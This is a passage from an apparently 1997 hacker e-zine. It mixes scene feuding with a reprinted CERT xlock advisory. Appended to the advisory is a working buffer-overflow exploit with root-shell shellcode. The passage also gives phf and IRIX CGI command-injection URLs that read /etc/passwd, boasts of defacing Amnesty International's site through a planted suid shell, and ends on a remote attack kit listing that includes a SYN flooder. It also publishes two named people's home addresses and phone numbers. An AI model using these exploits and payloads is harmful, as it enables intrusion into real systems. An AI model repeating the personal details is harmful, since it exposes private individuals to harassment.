  1686. h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
  1687. h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
  1688. h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
  1689. h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
  1690. h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
  1691. h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
  1692.  
  1693. I've seen one of those logs that Modify had (now CERT have them too) and,
  1694. I'm sooooo dissapointed to say...
  1695.  
  1696.             -I- -D-I-D-N-'-T -P-H-F- -T-H-O-S-E- S-I-T-E-S-
  1697.  
  1698. Let us look at the facts...Those that Hostile and his little lameassfuck sIn
  1699. wannabe haqr posse didn't even see :
  1700.  
  1701. -------------------------------------------------------------------------------
  1702.  THE FACTS :
  1703. -------------------------------------------------------------------------------
  1704.  
  1705.   CERT logs show that the phf queries to approximatley 80
  1706.   sites on the same day that the www.amnesty.org page was
  1707.   changed show that this technique was used..which is
  1708.   fundementally incorrect, here is the phf query string
  1709.   found in the logs, the fact that this was on the same
  1710.   day as amnesty is the ONLY factor linking me to these
  1711.   events :
  1712.  
  1713.     GET /cgi-bin/phf?qalias=X%0Acat%20/etc/passwd
  1714.  
  1715.   (I think there's also a "3D" somewhere in there too..)
  1716.  
  1717.   And here is the phf query code set down by every text
  1718.   I have ever read AND in phfscan.c which I would use if
  1719.   I ever wanted to scan such sites for the phf hole :
  1720.  
  1721.     GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
  1722.  
  1723.   I think we can all see a slight difference, which basically
  1724.   says "IT'S NOT MY FUCKING STYLE! ONLY A LUNA-FUCKING-TICK
  1725.   would even think about using that technique. Seeing it
  1726.   probably wouldn't work anyway."
  1727.  
  1728.   The next point is the IP from where the queries originate,
  1729.   it is *.telia.com which I have been told is a SWEDISH ISP
  1730.   now, do I live in Sweden? NO!! Do I have any shells at
  1731.   dynamic IP's IN SWEDEN? NO!! There is no plausible way
  1732.   I could have run such a scan. Unless I dial long distance,
  1733.   which isn't gonna happen.
  1734.  
  1735.   One last point, I knew that we "0wned" amnesty.org from
  1736.   about 2 weeks before we actually decided to change the
  1737.   index.html, because when my friends broke in the first
  1738.   time, they had set up a .rhosts file and a suid root shell
  1739.   in something like /tmp/.... But when they left the system
  1740.   and tried to regain access, they found that the admin had
  1741.   removed the account or changed the login and pass, so we
  1742.   decided to leave the site for about a week and a half, until
  1743.   we started to try and formulate a way to get back in, in
  1744.   this period we did NO phf scanning whatsoever. And on the
  1745.   weekend when we did get back in, using an ingenious method
  1746.   that I was never told about, by a new hacker to our team,
  1747.   modeX, we decided to at least do something to prove we had
  1748.   regained access, so I designed a new index.html, to which
  1749.   the team uploaded. That was all that happened, and therefore
  1750.   the phf scans can IN NO WAY be related to the amnesty.org
  1751.   attack as we owned that system A LONG TIME before, and it
  1752.   was only a matter of regaining access, one last point being
  1753.   that we didn't walk through the amnesty "front door" as it
  1754.   were, as I was told we stumbled over a trusted host,
  1755.   shell.oil.ca or something like that.
  1756.  
  1757.   Anyway, thats just a few points I would like to raise in
  1758.   proving that sIn are again VERY CL000LESS fucks who know
  1759.   absolutely NOTHING about hacking or "the scene" in any way
  1760.   shape or form...And as for the Incident Response Team, they
  1761.   are most probably looking for some lamefuck Swedish haqr.
  1762.  
  1763.   Any-Fucking-Way, what the fuck they gonna do when they find
  1764.   this haqr?!@ arrest him for phf'ing 80 sites? h0h0h0, I wouldn't
  1765.   call that much of a bust :) "Listen sonny! you're gonna get 10
  1766.   years for connecting to port 80 and typing "GET /cgi-bin/phf?
  1767.   Qalias=x%0a/bin/cat%20/etc/passwd" becuase thats not against
  1768.   ANY law and CERT owns us all.
  1769.  
  1770.     so1o.
  1771.    
  1772.   There are alot of missing pieces, and alot of the data I base
  1773.   my argument on originated from m0dify (see the letter to
  1774.   IRT@TELIA.NET earlier) so I think I have more of an idea than
  1775.   Hostile the cl00less lame gimpfuck wannabe haqr.
  1776.  
  1777. ───────────────────────────────────────────────────────────────────────────────
  1778.   7. CERT Advisory CA-97.13 : xlock vunerablity : Taken From Bugtraq
  1779. ───────────────────────────────────────────────────────────────────────────────
  1780.   Topic: Vulnerability in xlock
  1781. -------------------------------------------------------------------------------
  1782.  
  1783. The CERT Coordination Center has received reports that a buffer overflow
  1784. condition exists in some implementations of xlock. This vulnerability makes it
  1785. possible for local users (users with access to an account on the system) to
  1786. execute arbitrary programs as a privileged user.
  1787.  
  1788. Exploitation information involving this vulnerability has been made publicly
  1789. available.
  1790.  
  1791. If your system is vulnerable, the CERT/CC team recommends installing a
  1792. patch from your vendor. If you are not certain whether your system is
  1793. vulnerable or if you know that your system is vulnerable and you cannot add a
  1794. patch immediately, we urge you to apply the workaround described in
  1795. Section III.B.
  1796.  
  1797. We will update this advisory as we receive additional information.
  1798. Please check our advisory files regularly for updates that relate to your site.
  1799.  
  1800. -------------------------------------------------------------------------------
  1801.  
  1802. I.   Description
  1803.  
  1804.      xlock is a program that allows a user to "lock" an X terminal. A buffer
  1805.      overflow condition exists in some implementations of xlock. It is
  1806.      possible attain unauthorized access to a system by engineering a
  1807.      particular environment and calling a vulnerable version of xlock that has
  1808.      setuid or setgid bits set. Information about vulnerable versions must be
  1809.      obtained from vendors. Some vendor information can be found in Appendix A
  1810.      of this advisory.
  1811.  
  1812.      Exploitation information involving this vulnerability has been made
  1813.      publicly available.
  1814.  
  1815.      Note that this problem is different from that discussed in CERT Advisory
  1816.      CA-97.11.libXt.
  1817.  
  1818.  
  1819. II.  Impact
  1820.  
  1821.      Local users are able to execute arbitrary programs as a privileged user
  1822.      without authorization.
  1823.  
  1824.  
  1825. III. Solution
  1826.  
  1827.      Install a patch from your vendor as described in Solution A. If you are
  1828.      not certain whether your system is vulnerable or if you know that your
  1829.      system is vulnerable and you cannot install a patch immediately, we
  1830.      recommend Solution B.
  1831.  
  1832.      A.  Obtain and install a patch for this problem.
  1833.  
  1834.          Below is a list of vendors who have provided information about
  1835.          xlock. Details are in Appendix A of this advisory; we will
  1836.          update the appendix as we receive more information. If your
  1837.          vendor's name is not on this list, the CERT/CC did not hear from
  1838.          that vendor. Please contact your vendor directly.
  1839.  
  1840.          Berkeley Software Design, Inc. (BSDI)
  1841.          Cray Research - A Silicon Graphics Company
  1842.          Data General Corporation
  1843.          Digital Equipment Corporation
  1844.          FreeBSD, Inc.
  1845.          Hewlett-Packard Company
  1846.          IBM Corporation
  1847.          LINUX
  1848.          NEC Corporation
  1849.          The Open Group [This group distributes the publicly available software
  1850.                          that was formerly distributed by X Consortium]
  1851.          Solbourne
  1852.          Sun Microsystems, Inc.
  1853.  
  1854.  
  1855.      B.  We recommend the following workaround if you are not certain
  1856.          whether your system is vulnerable or if you know that your system
  1857.          is vulnerable and you cannot install a patch immediately.
  1858.  
  1859.          1. Find and disable any copies of xlock that exist on your system and
  1860.             that have the setuid or setgid bits set.
  1861.  
  1862.          2. Install a version of xlock known to be immune to this
  1863.             vulnerablility. One such supported tool is xlockmore. The latest
  1864.             version of this tool is 4.02, and you should ensure that this is
  1865.             the version you are using. This utility can be obtained from the
  1866.             following site:
  1867.  
  1868.                ftp://ftp.x.org/contrib/applications/xlockmore-4.02.tar.gz
  1869.                MD5 (xlockmore-4.02.tar.gz) = c158e6b4b99b3cff4b52b39219dbfe0e
  1870.  
  1871.             You can also obtain this version from mirror sites. A list of
  1872.             these sites will be displayed if you are not able to access the
  1873.             above archive due to load.
  1874.  
  1875. ...........................................................................
  1876.  
  1877. Appendix A - Vendor Information
  1878.  
  1879. Below is a list of the vendors who have provided information for this
  1880. advisory. We will update this appendix as we receive additional information.
  1881. If you do not see your vendor's name, the CERT/CC did not hear from that
  1882. vendor. Please contact the vendor directly.
  1883.  
  1884. Berkeley Software Design, Inc. (BSDI)
  1885. =====================================
  1886. BSD/OS is not vulnerable to the problem in xlock since our
  1887. xlock is not setuid.
  1888.  
  1889.  
  1890. Cray Research - A Silicon Graphics Company
  1891. ==========================================
  1892. Cray Research does not include xlock in its X Window releases, so we are
  1893. not at risk on the xlock buffer overflow problem.
  1894.  
  1895.  
  1896. Data General Corporation
  1897. ========================
  1898. The xlock sources (xlockmore-3.7) that DG includes in its contributed
  1899. software package have been modified to remove this vulnerability. These
  1900. will be available when release 8 comes out. We also recommend that our
  1901. customers who have the current version should change the sprintf calls in
  1902. resource.c to snprintf calls, rebuild and reinstall the package.
  1903.  
  1904.  
  1905. Digital Equipment Corporation
  1906. =============================
  1907. This reported problem is not present for Digital's ULTRIX or
  1908. Digital UNIX Operating Systems Software.
  1909.  
  1910.  
  1911. FreeBSD, Inc.
  1912. =============
  1913. The xlockmore version we ship in our ports collection is vulnerable
  1914. in all shipped releases. The port in FreeBSD-current is fixed.
  1915. Solution is to install the latest xlockmore version (4.02).
  1916.  
  1917.  
  1918. Hewlett-Packard Company
  1919. =======================
  1920. We ship an suid root program vuelock that is based on xlock.
  1921. It does have the vulnerability.
  1922.  
  1923. The only workaround is to remove the executable, the patch is "in process".
  1924.  
  1925.  
  1926. IBM Corporation
  1927. ===============
  1928. AIX is vulnerable to the conditions described in this advisory.
  1929. The following APARs will be released soon:
  1930.  
  1931.      AIX 3.2:  APAR IX68189
  1932.      AIX 4.1:  APAR IX68190
  1933.      AIX 4.2:  APAR IX68191
  1934.  
  1935. IBM and AIX are registered trademarks of International Business Machines
  1936. Corporation.
  1937.  
  1938.  
  1939. LINUX
  1940. =====
  1941. Red Hat:
  1942.         Not vulnerable
  1943.  
  1944. Caldera:
  1945.         Not vulnerable
  1946.  
  1947. Debian:
  1948.         An updated package is on the Debian site
  1949.  
  1950. SuSE:
  1951.         ftp://ftp.suse.com/pub/SuSE-Linux/suse_update/S.u.S.E.-4.4.1/xap1/xlock
  1952.  
  1953. And in general the new Xlockmore release fixes the problems.
  1954.  
  1955.  
  1956. NEC Corporation
  1957. ===============
  1958. UX/4800              Not vulnerable for all versions.
  1959. EWS-UX/V(Rel4.2MP)   Not vulnerable for all versions.
  1960. EWS-UX/V(Rel4.2)     Not vulnerable for all versions.
  1961. UP-UX/V(Rel4.2MP)    Not vulnerable for all versions.
  1962.  
  1963.  
  1964. The Open Group
  1965. ==============
  1966. Publicly available software that was formerly distributed by the X Consortium -
  1967.  
  1968. Not vulnerable.
  1969.  
  1970.  
  1971. Solbourne
  1972. =========
  1973. Solbourne is not vulnerable to this attack.
  1974.  
  1975.  
  1976. Sun Microsystems, Inc.
  1977. ======================
  1978. We are producing patches for OpenWindows 3.0 for Sun OS versions
  1979. 4.1.3_U1, 4.1.4, 5.3, 5.4, 5.5, and 5.5.1.
  1980.  
  1981.  
  1982.  
  1983. -------------------------------------------------------------------------------
  1984. The CERT Coordination Center thanks David Hedley for reporting the original
  1985. problem and Kaleb Keithley at The Open Group for his support in the
  1986. development of this advisory.
  1987. -------------------------------------------------------------------------------
  1988.  
  1989. If you believe that your system has been compromised, contact the CERT
  1990. Coordination Center or your representative in the Forum of Incident Response
  1991. and Security Teams (see http://www.first.org/team-info/).
  1992.  
  1993.  
  1994. CERT/CC Contact Information
  1995. ------------------------------
  1996.  
  1997. Email    cert@cert.org
  1998.  
  1999. Phone    +1 412-268-7090 (24-hour hotline)
  2000.                 CERT personnel answer 8:30-5:00 p.m. EST(GMT-5) / EDT(GMT-4)
  2001.                 and are on call for emergencies during other hours.
  2002.  
  2003. Fax      +1 412-268-6989
  2004.  
  2005. Postal address
  2006.  
  2007.          CERT Coordination Center
  2008.          Software Engineering Institute
  2009.          Carnegie Mellon University
  2010.          Pittsburgh PA 15213-3890
  2011.          USA
  2012.  
  2013. Using encryption
  2014.  
  2015.    We strongly urge you to encrypt sensitive information sent by email. We can
  2016.    support a shared DES key or PGP. Contact the CERT/CC for more information.
  2017.    Location of CERT PGP key
  2018.  
  2019.          ftp://info.cert.org/pub/CERT_PGP.key
  2020.  
  2021. Getting security information
  2022.  
  2023.    CERT publications and other security information are available from
  2024.  
  2025.         http://www.cert.org/
  2026.         ftp://info.cert.org/pub/
  2027.  
  2028.    CERT advisories and bulletins are also posted on the USENET newsgroup
  2029.  
  2030.         comp.security.announce
  2031.  
  2032.    To be added to our mailing list for advisories and bulletins, send
  2033.    email to
  2034.  
  2035.         cert-advisory-request@cert.org
  2036.  
  2037.    In the subject line, type
  2038.  
  2039.         SUBSCRIBE  your-email-address
  2040.  
  2041. -------------------------------------------------------------------------------
  2042. * Registered U.S. Patent and Trademark Office.
  2043.  
  2044. Copyright 1997 Carnegie Mellon University
  2045. This material may be reproduced and distributed without permission provided
  2046. it is used for noncommercial purposes and the copyright statement is
  2047. included.
  2048.  
  2049. The CERT Coordination Center is part of the Software Engineering Institute
  2050. (SEI). The SEI is sponsored by the U.S. Department of Defense.
  2051. -------------------------------------------------------------------------------
  2052.  
  2053. This file: ftp://info.cert.org/pub/cert_advisories/CA-97.13.xlock
  2054.            http://www.cert.org
  2055.  
  2056.                click on "CERT Advisories"
  2057.  
  2058. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2059. Revision history
  2060.  
  2061. -----BEGIN PGP SIGNATURE-----
  2062. Version: 2.6.2
  2063.  
  2064. iQCVAwUBM3DOFnVP+x0t4w7BAQH9MwQAwULlCDTqDbW+CiS0/Z36BtGf6Eqzx43B
  2065. pEt72rQlQbw2AqRnHeq85dzVUB4eKmL0T//bGYyo0sCt+8nlFaS3cNYh0cyl3jdu
  2066. JPDVoNhWB7v2+8nHvAEDz2UdomNVaxXDFvAbZ9JvEk/Ex6aFiXtl4qXdjxtcC4ze
  2067. kGKLcu0+LzE=
  2068. =nF5B
  2069. -----END PGP SIGNATURE-----
  2070.  
  2071. ------------------------------------------------------------------------------
  2072.   The Exploit Code - not in the *ORIGINAL* CERT advisory ;] :
  2073. ------------------------------------------------------------------------------
  2074.  
  2075. /*   x86 XLOCK overflow exploit
  2076.      by cesaro@0wned.org 4/17/97
  2077.  
  2078.      Original exploit framework - lpr exploit
  2079.  
  2080.      Usage: make xlock-exploit
  2081.             xlock-exploit  <optional_offset>
  2082.  
  2083.      Assumptions: xlock is suid root, and installed in /usr/X11/bin
  2084. */
  2085.  
  2086. #include <stdio.h>
  2087. #include <stdlib.h>
  2088. #include <unistd.h>
  2089.  
  2090. #define DEFAULT_OFFSET          50
  2091. #define BUFFER_SIZE             996
  2092.  
  2093. long get_esp(void)
  2094. {
  2095.    __asm__("movl %esp,%eax\n");
  2096. }
  2097.  
  2098. int main(int argc, char *argv[])
  2099. {
  2100.    char *buff = NULL;
  2101.    unsigned long *addr_ptr = NULL;
  2102.    char *ptr = NULL;
  2103.    int dfltOFFSET = DEFAULT_OFFSET;
  2104.  
  2105.    u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
  2106.                         "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
  2107.                         "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
  2108.                         "\xd7\xff\xff\xff/bin/sh";
  2109.    int i;
  2110.  
  2111.    if (argc > 1)
  2112.       dfltOFFSET = atoi(argv[1]);
  2113.    else printf("You can specify another offset as a parameter if you need...\n");
  2114.  
  2115.    buff = malloc(4096);
  2116.    if(!buff)
  2117.    {
  2118.       printf("can't allocate memory\n");
  2119.       exit(0);
  2120.    }
  2121.    ptr = buff;
  2122.    memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
  2123.    ptr += BUFFER_SIZE-strlen(execshell);
  2124.    for(i=0;i < strlen(execshell);i++)
  2125.       *(ptr++) = execshell[i];
  2126.    addr_ptr = (long *)ptr;
  2127.    for(i=0;i<2;i++)
  2128.       *(addr_ptr++) = get_esp() + dfltOFFSET;
  2129.    ptr = (char *)addr_ptr;
  2130.    *ptr = 0;
  2131.    execl("/usr/X11/bin/xlock", "xlock", "-nolock", "-name", buff, NULL);
  2132. }
  2133.  
  2134. ───────────────────────────────────────────────────────────────────────────────
  2135.   8. IRiX WWW Server Bugs : Tetsu Khan
  2136. ───────────────────────────────────────────────────────────────────────────────
  2137.  
  2138. Number 1 :
  2139. ----------
  2140.  
  2141. http://www.site.com/cgi-bin/wrap?/etc
  2142.  
  2143. ...Lets you view the contents of the /etc/ directory, you can try others too..
  2144.  
  2145. Number 2 :
  2146. ----------
  2147.  
  2148. http://www.site.com/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
  2149.  
  2150. ...Lets you view the /etc/passwd file, also try /etc/hosts to make sure the
  2151. cgi script isn't a trap. You can also execute some kind of remote shell using
  2152. webdist technique, but we are looking into it now...
  2153.  
  2154.  
  2155. ───────────────────────────────────────────────────────────────────────────────
  2156.   9. Hacking Not-So-Electrical Items : Tetsu Khan
  2157. ───────────────────────────────────────────────────────────────────────────────
  2158.  
  2159. y0h CrEw!@# T0daY wE WiLL LeArN tEw Hax0r....
  2160.  
  2161.                      TrEES!!! tReEs!!! TrEEs!!!
  2162.                      TrEES!!! tReEs!!! TrEEs!!!
  2163.                      TrEES!!! tReEs!!! TrEEs!!!
  2164.  
  2165. YePpO! TrEEs! LiKe Da oNeZ j00 FiNd In YeR GaRdEn SoMeTiMeS!!
  2166.  
  2167. oKaY, HeRe aRe THe k-LEeTo JuaReZ YeW wILL nEEd...
  2168.  
  2169.  1 : A HaCk SaW
  2170.  2 : CoMoFlAgUeD CLoThiNG
  2171.  3 : a CoPPeR NaiL
  2172.  4 : A hAmmER
  2173.  5 : a GI-JoE AcTiOn FiGuRe (WiTH pArAChUte)
  2174.  6 : a SmALL, wELL TrAiNeD InSecT, LiKe A bEE
  2175.  7 : oNe LaPtOp ComPUtEr (wIv d0S 2.4 *OnLy*)
  2176.  8 : OnE RS232 CaBlE
  2177.  
  2178. OkAy CrEw! ThIs iS Da mAsTA PlAn!@#
  2179.  
  2180. FiRsTly, aS WiTH mANy OtHer HaCks YoU WiLL nEEd tO ScAn Da PoRts Of ThE TrEE,
  2181. dO ThIs By UsIng tHE SmALL, wELL TrAiNeD InSecT, LiKe A bEE, aS bEE's aRe ThE
  2182. BeSt At SCannInG HiDDen PoRtz, WhEn ThE bEE HaS fOuND sOmE kEwL PoRtS (UsuALLy
  2183. aT dA tOp oF Da TrEE) tIe ThE GI-JoE AcTiOn FiGuRe tO ThE bEE, aNd gEt HiM To
  2184. PuT YeR Rs232 CaBle Up ThErE sO YeW CaN AcCesS dA PoRt Of Da TrEE!
  2185.  
  2186. WhEn ThE rS232 cAbLE iS In pLACe, PuT oN ThE CaMofLAUgEd CloTHIng, AnD HiDe
  2187. BeHiNd A bUsH WiTh YoUr LaPtOP, ThEn GeT ThE GI-JoE AcTiOn FiGuRe To PaRAcHute
  2188. d0Wn dA TrEE, aNd GiVe YoU ThE OTheR EnD Of dA Rs232 CaBLe, ThEn gO InTo DoS
  2189. AnD RuN tHiS PrOgRam In Gw-BASiC...
  2190.  
  2191. 10 OPEN (COM PORT AND STUFF)
  2192. 20 DATA "GIVE ME ALL YOUR K-LEET JUAREZ AND STUFF NOW, BECAUSE I OWN J00"
  2193. 30 OPEN (ANOTHER PORT AND STUFF)
  2194. 40 DATA "EYE BE W00PIN J00 F00L, PHEAR MUH ELEETNESS"
  2195. 50 GOTO 10
  2196.  
  2197. ThIs ShOuLd cRaSh ThE TrEE, LeAvInG iT OpEn tO AtTaCk, NeXt TaKE ThE HaCk SaW
  2198. AnD StArT cUtTiNg The BaRK oFF ThE TrEE (OnLy iN oNe pLaCe) ThE BArk AcTs LiKe
  2199. a FiRewALL, AnD sO It MuSt Be tAkeN DoWN FirSt.
  2200.  
  2201. NeXt CHecK On YoUr LaPtOp WheThEr ThE TrEE HaS GiVen yEw eLeeT JuArEz, iF NoT
  2202. ThEN uSe The CoPPeR nAiL to rm -rf / ThE TrEE, HaMmEr The CoPPeR nAiL InTo The
  2203. TrEE, AnD ThE TrEE WiLL bE rm'd WitHiN aBOUt A wEEk (dEw TeW 99999999999999 GB
  2204. HaRd dRivE SPaCe)
  2205.  
  2206. hAvE PhUn! MoRe NoT-So-LeCtiCaL iTeMz NeXt TimE!@~^&*
  2207.  
  2208. TeEkAy.
  2209.  
  2210. ───────────────────────────────────────────────────────────────────────────────
  2211. ===============================================================================
  2212. ==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]==
  2213. ===============================================================================
  2214. ───────────────────────────────────────────────────────────────────────────────
  2215.   1. Amnesty International Hacked : Article From cnet.com
  2216. ───────────────────────────────────────────────────────────────────────────────
  2217.  
  2218. http://www.news.com/News/Item/0,4,10135,00.html
  2219.  
  2220. Amnesty International hacked 
  2221.  
  2222.                 By Janet Kornblum
  2223.                 April 28, 1997, 3:15 p.m. PT 
  2224.  
  2225.                 Hackers broke into the Amnesty International home
  2226.                 page over the weekend, altering it with a highly
  2227.                 stylized, futuristic-looking graphic of a small child or
  2228.                 baby smoking a cigarette. 
  2229.  
  2230.                 Amnesty International didn't know what the
  2231.                 perpetrators wanted to accomplish with the
  2232.                 hacking, which was strikingly apolitical considering
  2233.                 the political nature of the target. Above the picture,
  2234.                 the altered Web page read, "Who laughs last? We
  2235.                 are the 4 man dream team, just proving one of
  2236.                 many points." 
  2237.  
  2238.                 But just what those points were was lost on many,
  2239.                 not the least of whom was Mike Blackstock, the
  2240.                 system administrator for Ontario Internet Link, the
  2241.                 small Canadian Internet service provider that hosts
  2242.                 the Amnesty site for free. 
  2243.  
  2244.                 "As far as I can tell, they didn't do anything
  2245.                 malicious," he said. "They replaced one page of
  2246.                 Amnesty with a silly graphic of a kid smoking. This
  2247.                 was not political as far as I could tell. The only
  2248.                 politics I could think of was cigarettes." 
  2249.  
  2250.                 Beneath the picture, the page is signed, "Thanx to:
  2251.                 so1o, modeX, XFli, mstrhelix...CodeZero uber
  2252.                 alles!" 
  2253.  
  2254.                 This hack appears to be unrelated to other recent
  2255.                 high-profile incidents, including one last week in
  2256.                 which a Portuguese group broke in to Indonesian
  2257.                 government Web pages to protest its treatment of
  2258.                 East Timor. In that case, the hackers--referred to
  2259.                 by many as "crackers" because they crack into
  2260.                 systems--were quite clear about the reasons behind
  2261.                 their action. 
  2262.  
  2263.                 In the case of the Amnesty page, Blackstone said
  2264.                 the hackers only altered the Web page and did not
  2265.                 cause major damage, though they could have done
  2266.                 so if they wanted to. The altered page was up for a
  2267.                 few hours, he said. 
  2268.  
  2269.                 Blackstone was busy plugging the security hole but
  2270.                 pointed out that sites much bigger with higher
  2271.                 profiles, such as the Air Force, the Central
  2272.                 Intelligence Agency, and the Justice Department,
  2273.                 also have been hacked. 
  2274.  
  2275. ───────────────────────────────────────────────────────────────────────────────
  2276.   2. //sToRm// Of sIn Rips Port Pro : so1o
  2277. ───────────────────────────────────────────────────────────────────────────────
  2278.  
  2279.   Ummmm, on www.sinnerz.com //sToRm// has a lamefuck page with his k-leet
  2280.   w1nd0ze '95 juarez, coded in Visual Basic, with his "VB For Dummies" book,
  2281.   which include...
  2282.  
  2283. DrSpewfy         :  Pile'O'Crap, why not get a nameserver and sirc? and
  2284.                     actually be able to talk to people?
  2285.  
  2286. DCCNewk          :  Chargen Flood? why not try like, SYN FLOOD? d0h..
  2287.  
  2288. Port Pro         :  Okay, original Port Pro is SHAREWARE, made by Blue Byte
  2289.                     Software, and it is SOOO obvious that //sToRm// just did a
  2290.                     little bit of hex editing, and B00oo00m! hes changed the
  2291.                     authors name and shit to his own! but ummm, because of his
  2292.                     EXTREME lameness, he didn't know how to change the program
  2293.                     name, the version and the general interface and look of the
  2294.                     program, what a LAME FUCK. I'm sure he will have Blue Byte
  2295.                     on his fucking ass with Copyright and shit. h0h0h0h0h0!@#
  2296.                     I doubt //sToRm// coded *ANYTHING* on that page,
  2297.                     as DrSpewfy is just shit, and DCCNewk is just like the DCC
  2298.                     Nuking code we put out in the CodeZero Technical Journal
  2299.                     Issue 2 :)
  2300.  
  2301. ───────────────────────────────────────────────────────────────────────────────
  2302.   3. Digital Darkness Lives : so1o
  2303. ───────────────────────────────────────────────────────────────────────────────
  2304.  
  2305. It looked as if the DD wouldn't bring out a magazine this month, but they
  2306. got a huge influx of submissions and live another day!@# if you want to submit
  2307. anything for DD, mail spamman@erols.com or spaman@erols.com 'cos I ain't shure.
  2308.  
  2309. Visit their page too : http://dd.home.ml.org
  2310.  
  2311. ───────────────────────────────────────────────────────────────────────────────
  2312.   4. /home/sdr 0wned : so1o
  2313. ───────────────────────────────────────────────────────────────────────────────
  2314.  
  2315. sdr, a user of duncan.nac.net (owned by bspline - where all the cool people on
  2316. efnet have their shells) was playing with the permissions in his home directory
  2317. and he accidentally made the whole directory world readable, so then cold blood
  2318. and others got all of sdr's k-leet y00nix juarez, and tar'd + gz'd them up and
  2319. were distributing the sdr.tar.gz in #hack using XDCC :)
  2320.  
  2321. ───────────────────────────────────────────────────────────────────────────────
  2322.   5. Sendmail 8.8.4 Remote Is Out : so1o
  2323. ───────────────────────────────────────────────────────────────────────────────
  2324.  
  2325. Yep, its been confirmed, the sendmail 884 remote exploit for ALL OS's is now
  2326. out, there was some delay in r00t members getting the offsets needed for each
  2327. Operating System, but now the technique is complete, and many 8.8.4 systems
  2328. are vunerable. Sendmail 8.8.5 remote exploits are being looked into now.
  2329.  
  2330. ───────────────────────────────────────────────────────────────────────────────
  2331.   6. sIn inf0z Part 2 : The CodeZero
  2332. ───────────────────────────────────────────────────────────────────────────────
  2333. -------------------------------------------------------------------------------
  2334.  =-= w0wie!@# we g0t 2 n0w!! =-=
  2335. -------------------------------------------------------------------------------
  2336.  
  2337.  Alias      :  Evil Chick
  2338.  
  2339.  Real Name  :  Suzette Kimminau
  2340.  
  2341.  Address    :  130 105th Ave. S.E. Apt. 218
  2342.                Bellevue, Wa 98004
  2343.                USA
  2344.  
  2345.  Telephone  :  (206)454-7176
  2346.  Email      :  evilchic@NWLINK.COM
  2347.  
  2348. -------------------------------------------------------------------------------
  2349.  
  2350.  Alias      :  \\StOrM\\
  2351.  
  2352.  Real Name  :  Jason Sloderbeck
  2353.  
  2354.  Address    :  5739 N Norton,
  2355.                Kansas City, MO 64119
  2356.                USA
  2357.  
  2358.  Telephone  :  (816)453-8722
  2359.  Email      :  storm@SINNERZ.COM
  2360.  
  2361. -------------------------------------------------------------------------------
  2362.  aS wE PrOMiSeD LasT t1me! eXpect m0re s00n!
  2363. ───────────────────────────────────────────────────────────────────────────────
  2364. ===============================================================================
  2365. ==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]==
  2366. ===============================================================================
  2367. ───────────────────────────────────────────────────────────────────────────────
  2368. -/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
  2369. =/-/=/-/=/-/=/-/=/-/=/-/ so1o of The CodeZero presents. \-\=\-\=\-\=\-\=\-\=\-\=
  2370. -/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
  2371. =/-/=/-/=/-/=/-/=/-/=/-/         The CodeZero           \-\=\-\=\-\=\-\=\-\=\-\=
  2372. =/-/=/-/=/-/=/-/=/-/=/-/       Remote Attack Kit.       \-\=\-\=\-\=\-\=\-\=\-\=
  2373. =/-/=/-/=/-/=/-/=/-/=/-/            [CRAK]              \-\=\-\=\-\=\-\=\-\=\-\=
  2374. -/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
  2375. =/-/=/-/=/-/=/-/=/-/=/-/   .:.   -=10/05/97=-  .:.      \-\=\-\=\-\=\-\=\-\=\-\=
  2376. -/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
  2377. ───────────────────────────────────────────────────────────────────────────────
  2378.  
  2379. w00 w00!! Now you can have k-leet skills like me! Firstly upload the crak.tar
  2380. to a linux 2.0.x system, or to your own, then tar -xvf crack.tar to unzip the
  2381. file, then move the files around and shit if you want to, then you're ready
  2382. to go! Expect OS specific kits in later issues...And Multi-Scan s00n.
  2383.  
  2384. ===============================================================================
  2385.   The Contents Of The Kit :
  2386. ===============================================================================
  2387.  
  2388. dnsscan   : Mass DNS query program, gets  lists of systems in entire countries,
  2389.             or all the systems on a network, like *.microsoft.com.
  2390.  
  2391. phpscan   : Scans hosts from a file and outputs a list of php vunerable sites.
  2392. phpget    : Gets files from php vunerable servers.
  2393. phfscan   : Scans hosts from a file and outputs a list of php vunerable sites.
  2394. ident-scan: Scans all daemons running on ports and determines cool stuff.
  2395.  
  2396. tcpprobe  : Very simple portscanner.
  2397. fingah    : Uses an apache hole to finger systems if port 79 isnt open.
  2398. synk4     : SYN flooder, basically kicks the shit out of systems.
  2399.  
  2400. ===============================================================================
  2401.   Usages :
  2402. ===============================================================================
  2403.  
  2404. Use this command to unzip the crak.tar...
  2405.  
  2406.  % tar -xvf crak.tar
